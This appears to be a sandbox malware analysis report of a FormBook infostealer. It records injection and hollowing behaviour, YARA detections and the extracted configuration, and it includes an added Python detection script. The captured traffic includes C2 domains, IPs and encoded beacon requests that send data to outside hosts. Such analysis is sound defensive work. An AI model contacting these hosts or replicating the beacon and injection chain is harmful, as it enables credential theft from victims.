

Windows Analysis Report
vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 680447
MD5: ba5fa6ee78fe62b57ce7947f6bdb86ff
SHA1: f8409167b9b3e09f390c28cbcebfbec670af16de
SHA256: c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • vbc.exe (PID: 6088 cmdline: "C:\Users\user\Desktop\vbc.exe" MD5: BA5FA6EE78FE62B57CE7947F6BDB86FF)
    • vbc.exe (PID: 3976 cmdline: C:\Users\user\Desktop\vbc.exe MD5: BA5FA6EE78FE62B57CE7947F6BDB86FF)
    • vbc.exe (PID: 5776 cmdline: C:\Users\user\Desktop\vbc.exe MD5: BA5FA6EE78FE62B57CE7947F6BDB86FF)
      • explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup
Malware configuration (FormBook, extracted from memory; the decoy entries are reproduced as extracted, i.e. base64 of the encrypted values, and do not decode to hostnames without the sample's key):

{"C2 list": ["www.reliabenefitssupport.com/etn4/"], "decoy": ["rV2+KhY2v4ETgrjhsOdtLg==", "eSFnVjRiqHAIadtGwrlpa74g6QcN", "WZH5aS87DxPqd6LDQIeq4JfVOck=", "YXnbVkLXpUHo30zy", "ESabcsMz4lz1XQ==", "mL0iinqiZDYNlkQ=", "jkmgFdnw4lz1XQ==", "G7v+3ZquDaYqgMM44ViNN86tgw==", "fENjGOD2ZVQDed3Mwx8=", "iCtlTip4Pd1nyU7+qostG4sg6QcN", "qcQk+tw6bXxKYg7Bt6U1", "7Z374sbf2YQ20GDBt6U1", "P/5LupTXJv+9QA==", "okeclmSxOBqVypK3Qbw/N86tgw==", "5qsId0poQS3V/igYoQ==", "c4Ho3qfDIR7N3N3Mwx8=", "6IPSTh4/Dd9+AxAt9JBvIgw=", "87ESB8bRIASQ21AHs4srEJUueZ4bcCA=", "ed5PMq5cJ7wf", "KOdLpJv3iTfGC/Yh8JBvIgw=", "IjuokGaEheWX0kXw", "54lp0LAGDcjT+sLlsOdtLg==", "hUCHBtHr4lz1XQ==", "Smr7HOz3z9Lo30zy", "SlvEQBVnZhEXRcUipw==", "8ZRlzaD4vtLo30zy", "hzUJ6+ZA0Ni5593Mwx8=", "CBpvZ0VrqnIimUD78pBvIgw=", "gevEKiV7emwbk4167ErNe3RucHmhf5gZ", "+7WJXFqv+stZyH4ts6O2ZpfVOck=", "xWhDroGpqZFTohQ1qw==", "DiNuwbgR1pInnYrsWfModZfVOck=", "VCNwUfqPHCj2gCKUOdCLDwY=", "Zbyd6qqyqv3+qibRwh0=", "hQ8A9Mn1PV8/ahDBt6U1", "bRsE/+D2dYA3px6Nm5Ar", "13fAoonmbJt7x/YhlQWeZF+xNMM=", "OUNALhAnXym6C27oYZBvIgw=", "/JFzZjNNy8FufbxiR5y7bpfVOck=", "Ezt/7MDk88rfAbyyXDf6ri6D", "OveJTrEkjffzEUw=", "P+nKsn6TDRbhcyzWXkjZxIdyP94=", "qj0kA9PnPj0HLGYL3o2LCzSF", "xoHVLjFOiHpklb9iXNEA822rlA==", "Me5FrmyQQ1ktS4j+pQH9c5fVOck=", "fhrqUiZJWjVO3QD3", "uWEoEq8LmA==", "ki96WDIo+QLw6vAPddk9", "SILf07XfI+B53VrBt6U1", "zI/68LrZeDDuEE4=", "Ude5qpW19dSOFsx3/uZ/gN7X1gFcHg==", "K+FAq4KZIOLiaxTKvA/6ri6D", "8AVbxnGVmZ90l2BBFGMi", "321HQPJDy7V8oVBK8uPhGoog6QcN", "tG83oX2Ynbmj6VvBt6U1", "9Y55bFqvNyboed3Mwx8=", "O88UfEGPq1PPJaZS9hSYZBs=", "XyL3blOj7cF7nt6NDu3mrvcOI6YF", "u0+YhnzTEtKgw1H4", "vSmevGTLljuzSg==", "K+w3E/dcJ7wf", "X2+vnIixBeq6593Mwx8=", "aPPTtXp9zMh68pQD/AinOQ==", "p1Y3rXrJMTUeWaFaQ74HQ5Qg6QcN"]}
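The process tree above is the FormBook execution pattern: the dropper starts a second copy of itself (the hollowing target), the hollowed copy injects into the already-running explorer.exe, and Explorer then launches a 32-bit system binary (control.exe, process index 0D in the Yara section) that runs the final payload and the C2 loop. The Python below is an added example, not part of the Joe Sandbox report, that encodes those observations as checks over process records constructed from the tree and the Networking section. The record layout, the `edge="inject"` tag and the finding names are the example's own assumptions; in EDR telemetry the explorer.exe hop shows up as a cross-process write or remote thread rather than a process creation, which is why it is tagged separately here.

```python
"""Triage checks over the process tree from the report above (added example)."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent_pid: int          # 0 for the root of the tree
    edge: str = "create"     # "create": process creation; "inject": code injected into a running process


# Constructed from the sandbox tree above. The sandbox nests explorer.exe under vbc.exe
# (PID 5776) because vbc.exe injected into the already-running shell; that hop is
# tagged "inject" here (an assumption of this example, not a field the report has).
TREE = [
    Proc(6088, r"C:\Users\user\Desktop\vbc.exe", r'"C:\Users\user\Desktop\vbc.exe"', 0),
    Proc(3976, r"C:\Users\user\Desktop\vbc.exe", r"C:\Users\user\Desktop\vbc.exe", 6088),
    Proc(5776, r"C:\Users\user\Desktop\vbc.exe", r"C:\Users\user\Desktop\vbc.exe", 6088),
    Proc(3688, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE", 5776, edge="inject"),
    Proc(1272, r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\control.exe", 3688),
]

# Outbound TCP connections the sandbox attributed to explorer.exe (Networking section above).
CONNECTS: Dict[int, List[Tuple[str, int]]] = {
    3688: [("192.185.131.238", 80), ("108.167.169.56", 80), ("103.141.97.24", 80)],
}

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _is_explorer(p: Proc) -> bool:
    return p.image.lower() == "c:\\windows\\explorer.exe"


def triage(tree: List[Proc], connects: Dict[int, List[Tuple[str, int]]]) -> List[Tuple[str, int]]:
    """Return (finding, pid) pairs; each finding corresponds to one of the report's signatures."""
    procs = {p.pid: p for p in tree}
    findings: List[Tuple[str, int]] = []
    for p in tree:
        parent = procs.get(p.parent_pid)
        if parent is None:
            continue
        # "Sample uses process hollowing" / "Creates a process in suspended mode":
        # a binary starting a second copy of itself, which the parent then overwrites.
        if p.edge == "create" and p.image.lower() == parent.image.lower():
            findings.append(("self_spawn_hollowing_candidate", p.pid))
        # "Maps a DLL or memory area into another process": a binary from a
        # user-writable path injecting into the shell.
        if p.edge == "inject" and _is_explorer(p) and parent.image.lower().startswith(USER_WRITABLE):
            findings.append(("injection_into_explorer", p.pid))
        # An injected Explorer launching a system binary with no arguments. Alone this is
        # weak (Explorer starts control.exe legitimately); after an injection it is not.
        if (parent.edge == "inject" and _is_explorer(parent)
                and p.image.lower().startswith(SYSTEM_DIRS)
                and p.cmdline.strip('"').lower() == p.image.lower()):
            findings.append(("injected_explorer_spawns_system_binary", p.pid))
    # "System process connects to network": the shell talking HTTP(S) to external hosts.
    for pid, conns in connects.items():
        proc = procs.get(pid)
        if proc and _is_explorer(proc) and any(port in (80, 443) for _, port in conns):
            findings.append(("explorer_outbound_http", pid))
    return findings


if __name__ == "__main__":
    for finding, pid in triage(TREE, CONNECTS):
        print(f"{finding:45} PID {pid}")
```

The same checks with a benign tree (Explorer starting control.exe on its own, no injection edge, no outbound connections) produce no findings, which is the point of tying the control.exe rule to the preceding injection rather than to the image name alone.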
Source | Rule | Description | Author | Strings
00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6621:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1d7d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa95f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa52a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb272:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1c427:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1d53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18e79:$sqlite3step: 68 34 1C 7B E1
  • 0x18fac:$sqlite3step: 68 34 1C 7B E1
  • 0x18ebb:$sqlite3text: 68 38 2A 90 C5
  • 0x19003:$sqlite3text: 68 38 2A 90 C5
  • 0x18ed2:$sqlite3blob: 68 53 D8 7F 8C
  • 0x19025:$sqlite3blob: 68 53 D8 7F 8C
(29 further entries not shown)

The 68 xx xx xx xx strings in the JPCERT/CC rule are x86 push imm32 instructions; the rule keys on the 32-bit constants FormBook pushes to resolve its sqlite3 step / column_text / column_blob calls, which is how the browser-database harvesting listed under Signatures shows up in memory.
Source | Rule | Description | Author | Strings
6.0.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.vbc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5821:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1c9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9b5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x15d87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.0.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x15b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x972a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1487c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa472:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b627:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c73a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18079:$sqlite3step: 68 34 1C 7B E1
  • 0x181ac:$sqlite3step: 68 34 1C 7B E1
  • 0x180bb:$sqlite3text: 68 38 2A 90 C5
  • 0x18203:$sqlite3text: 68 38 2A 90 C5
  • 0x180d2:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18225:$sqlite3blob: 68 53 D8 7F 8C

No Sigma rule has matched
No Snort rule has matched



AV Detection

Source: vbc.exe | ReversingLabs: Detection: 31%
Source: Yara match | File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: vbc.exe | Joe Sandbox ML: detected
Source: 6.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 www.reliabenefitssupport.com/etn4/ plus 64 decoy entries; the full configuration is listed under Classification above)
Source: vbc.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vbc.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP | source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

wntdll.pdb is the symbol file name of the 32-bit ntdll.dll used under WOW64. Finding it in private (non-image) memory of both the unpacked vbc.exe instance (process 6) and control.exe (process 13) is consistent with FormBook mapping its own copy of ntdll to call its exports directly, which defeats user-mode API hooks; tools that enumerate only the loaded-module list will not see that copy.

Networking

Source: C:\Windows\explorer.exe | Network Connect: 192.185.131.238 80
Source: C:\Windows\explorer.exe | Network Connect: 108.167.169.56 80
Source: C:\Windows\explorer.exe | Network Connect: 103.141.97.24 80
Source: C:\Windows\explorer.exe | Domain query: www.funwave.info
Source: C:\Windows\explorer.exe | Domain query: www.tadeumilhosrp.com
Source: C:\Windows\explorer.exe | Domain query: www.reprograme-se10x.com
Source: Malware configuration extractor | URLs: www.reliabenefitssupport.com/etn4/
Source: Joe Sandbox View | ASN Name: VECTANTARTERIANetworksCorporationJP
Source: global traffic | HTTP traffic detected:
  GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1
  Host: www.funwave.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (7 NUL bytes, not printable)
Source: global traffic | HTTP traffic detected:
  GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1
  Host: www.reprograme-se10x.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (7 NUL bytes, not printable)
Source: global traffic | HTTP traffic detected:
  GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1
  Host: www.tadeumilhosrp.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (7 NUL bytes, not printable)
Source: Joe Sandbox View | IP Address: 192.185.131.238
Source: global traffic | HTTP traffic detected:
  POST /etn4/ HTTP/1.1
  Host: www.reprograme-se10x.com
  Connection: close
  Content-Length: 418
  Cache-Control: no-cache
  Origin: http://www.reprograme-se10x.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.reprograme-se10x.com/etn4/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00
  Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo. (followed by 8 NUL bytes)
Source: global traffic | HTTP traffic detected:
  POST /etn4/ HTTP/1.1
  Host: www.tadeumilhosrp.com
  Connection: close
  Content-Length: 418
  Cache-Control: no-cache
  Origin: http://www.tadeumilhosrp.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.tadeumilhosrp.com/etn4/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 63 52 76 74 35 78 54 68 3d 79 54 52 71 74 42 46 70 58 5f 6b 4e 44 76 44 76 77 58 43 2d 77 7a 57 53 6b 71 71 37 68 4f 4e 62 51 51 69 61 46 4b 49 56 74 37 6d 63 34 6d 51 70 4f 5f 54 63 5a 48 43 51 48 6f 4c 49 62 2d 56 6f 57 67 6c 49 54 56 6f 68 7a 6c 64 6c 37 6c 36 46 28 36 51 4c 6e 69 55 74 4b 64 49 39 50 55 34 67 6e 6e 70 35 63 34 6e 59 44 51 7a 63 45 43 32 76 5a 45 6e 4a 67 74 6f 70 42 41 35 49 51 5f 28 31 35 48 77 7a 48 72 64 47 48 6b 4a 34 32 54 63 5a 4f 37 76 67 6c 6e 70 63 42 74 70 63 72 66 4b 5f 56 69 36 48 4c 68 49 78 35 5f 69 44 74 51 46 34 51 6f 6b 33 41 65 75 5f 36 6a 49 66 6e 36 54 69 75 53 39 46 66 4a 4d 6a 78 6f 42 6c 63 59 76 65 43 75 74 66 7a 4f 69 4e 73 41 68 6f 47 7a 42 33 49 6f 44 47 30 54 37 48 6b 45 58 33 4e 32 58 32 66 48 7a 68 4d 64 49 69 37 67 39 54 6c 63 28 38 79 69 65 35 77 65 67 50 64 62 42 37 72 55 68 61 61 30 28 5a 6e 35 49 6c 53 39 6c 69 67 6d 69 59 6f 70 78 69 65 5a 42 32 61 77 50 73 38 53 6a 53 76 62 61 73 5a 52 63 55 4f 51 37 4b 36 55 6c 5a 78 43 76 6d 6f 42 4d 71 61 4d 44 4d 49 58 62 6f 56 39 61 72 52 7a 36 37 33 53 33 4c 38 2d 6b 57 43 32 5a 66 6a 30 77 73 4a 68 46 76 4f 74 47 39 28 53 4f 47 33 68 56 79 6c 37 74 4f 4d 32 35 62 6a 4d 74 50 32 38 28 77 54 69 63 42 76 74 30 57 30 39 35 6e 47 71 67 2e 00 00 00 00 00 00 00 00
  Data Ascii: cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg. (followed by 8 NUL bytes)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 08 Aug 2022 14:11:20 GMT
  Server: Apache
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"
  Upgrade: h2,h2c
  Connection: Upgrade, close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 14456
  Content-Type: text/html; charset=UTF-8
  Data Raw (gzip-compressed body, truncated in the report): 1f 8b 08 00 00 00 00 00 00 03 ed b2 eb 92 e3 c6 b1 35 fa db fd 14 35 54 48 43 da 2c 10 e0 b5 1b 6c b6 2d c9 b2 3e 47 58 de 0e 8d bc bf 38 61 3b 26 8a 40 02 a8 e9 42 15 5c 55 e0 65 e8 3e 7f f7 73 7c 71 7e 9c 77 38 7f fd 62 27 0b e0 ad bb c1 be cd 8c e4 bd ad e9 21 59 95 95 b9 72 e5 ca 75 f9 ea b7 ff f1 f5 0f ff d7 9f be 21 99 cd c5 d5 d9 a5 fb 21 82 c9 74 d6 2a 2c fd d3 0f 2d 17 03 16 5f 9d fd e2 32 07 cb 48 94 31 6d c0 ce 5a 7f fe e1 77 f4 bc 45 7a fb 17 c9 72 98 b5 16 1c 96 85 d2 b6 45 22 25 2d 48 cc 5c f2 d8 66 b3 18 16 3c 02 5a 5d ba 84 4b 6e 39 13 d4 44 4c c0 2c a8 70 8e 60 5e 6b 35 57 d6 bc de 83 bc ce d9 8a f2 9c a5 40 0b 0d ae 49 28 98 4e e1 75 55 68 b9 15 70 f5 a7 7f fe 9f 94 4b 44 f8 e7 ff a3 08 48 57 aa 59 cc c8 17 9f 9d f7 83 60 4a be 87 42 ab 54 23 3e 35 40 80 fc e7 37 7f fc e7 7f 7d e9 5d f6 ea f2 b3 4b c1 e5 35 d1 20 66 af 63 69 5c 9f 04 6c 94 bd 26 19 9e 66 af 7b 3d 7d 0c 10 f8 2b 2f 52 79 4d e0 b1 4a e3 2d 3d a5 d3 3b c9 2d 26 2c 68 c9 2c b4 88 5d 17 a8 1e 2b 0a c1 23 66 b9 92 3d 6d cc af 56 b9 c0 27 47 6f d6 3a 41 9f 7c a1 d9 df 4b 35 25 bf 03 88 5b 75 c7 56 66 6d 61 c2 66 c6 bd 04 13 7b ad 4f 4d 85 c4 80 db cb 71 79 ff fc 3f 9a 2b f3 24 6a f8 71 15 e6 98 a3 89 34 2f ec d5 d9 92 cb 58 2d bd b7 cb 02 72 f5 8e bf 01 6b b9 4c 0d 99 91 4d 6b ce 0c fc 59 8b 56 b8 85 ff 6b ef af 3b cd ff da ab 6c 63 fe 8a e0 1a fe da ab 8a ff da 0b 86 9e ef f9 7f ed 4d fa ab 49 ff af bd 56 b7 05 2b 8b f5 5e 21 53 bc 98 45 fa 32 3c 2c ac d0 f0 f7 9b 1a 10 4f ee ae 4a 1d 41 2b dc b4 d0 97 28 6b 55 b6 c5 af e0 9b f4 f8 6b 6f 59 50 2e 23 51 c6 ae e1 3b 53 05 aa 52 8a 5b 03 9c da cb b9 f4 de 99 5f 2f 40 cf c6 48 21 68 dd dc 4c cf 7a bf 7c 45 7e c8 b8 21 09 17 40 f0 97 95 56 d1 14 24 68 6c 1d 93 5f f6 ce 5e 25 a5 8c dc 76 db d0 65 5d db d9 2c 98 26 b2 ab bb aa cb 67 cc 8b 34 60 e6 37 02 dc 3e da ad 88 c9 05 33 ad 4e b7 98 71 2f 05 fb b5 92 16 05 fb e2 8b e3 5b bb d5 8f 5b 9d e9 0e 98 18 84 de 02 b3 d9 1b ab 71 5d 5e a2 55 fe 75 c6 f4 d7 2a 86 2e cc da 85 17 e1 1c fa 7b 88 6c db ef fa 5d ee 2d 79 6c 33 fc cd 80 a7 99 c5 8e 1e 0e 21 7e 70 f8 cc 73 ae 5c b7 2d 8e d6 85 0e a6 fb 1d cc b4 ea b7 cc b2 3f 7f ff 87 76 a7 33 d5 60 4b 2d c9 cb 71 ed 16 17 66 b3 d9 2d ec 9b fd 60 51 1b ea b1 ec 7d a5 6a bb a2 0c d6 33 3a 9a a1 02 